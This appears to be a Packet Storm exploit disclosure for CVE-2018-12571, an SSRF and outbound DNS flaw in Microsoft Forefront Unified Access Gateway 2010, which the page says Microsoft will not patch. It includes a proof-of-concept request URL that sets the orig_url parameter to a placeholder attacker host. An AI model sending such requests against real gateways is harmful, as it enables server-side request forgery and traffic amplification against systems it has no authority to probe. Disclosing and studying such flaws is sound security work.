Lucene search
Okan CoskunPACKETSTORM:148389HistoryJul 02, 2018 - 12:00 a.m.
Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction
2018-07-0200:00:00
Okan Coskun
packetstormsecurity.com
34
EPSS
0.036
Percentile
91.9%
`# Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction
# Vendor Homepage: https://www.microsoft.com/
# Version: 2010
# CVE : CVE-2018-12571
# Proof of Concept #1
Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to
trigger outbound DNS queries for arbitrary hosts via a comma-separated list
of URLs in the orig_url parameter, possibly causing a traffic amplification
and/or SSRF outcome.
/uniquesig697e96fe58e5694d9b118768d8189a4c/uniquesig0/InternalSite/InitParams.aspx?referrer=/InternalSite/StartApp.asp&resource%5Fid=8B92B86E36904E2FA83C890F8C864A50&login%5Ftype=0&site%5Fname=test&secure=0&URLHASH=47c74c53%2Dfaae%2D41ae%2D89f1%2D1eb6eff34091&*orig%5Furl=http%3A%2F%2FATTACKER.SITE.COM
<http://2FATTACKER.SITE.COM>%2Ftest*
# Fixes
It will not be patched by Microsoft.
`
Related
prion
prion
Design/Logic Flaw
2018-07-05 20:29:00
cve
cve
CVE-2018-12571
2018-07-05 20:29:00
cvelist
cvelist
CVE-2018-12571
2018-07-05 20:00:00
zdt
zdt
nvd
nvd
CVE-2018-12571
2018-07-05 20:29:00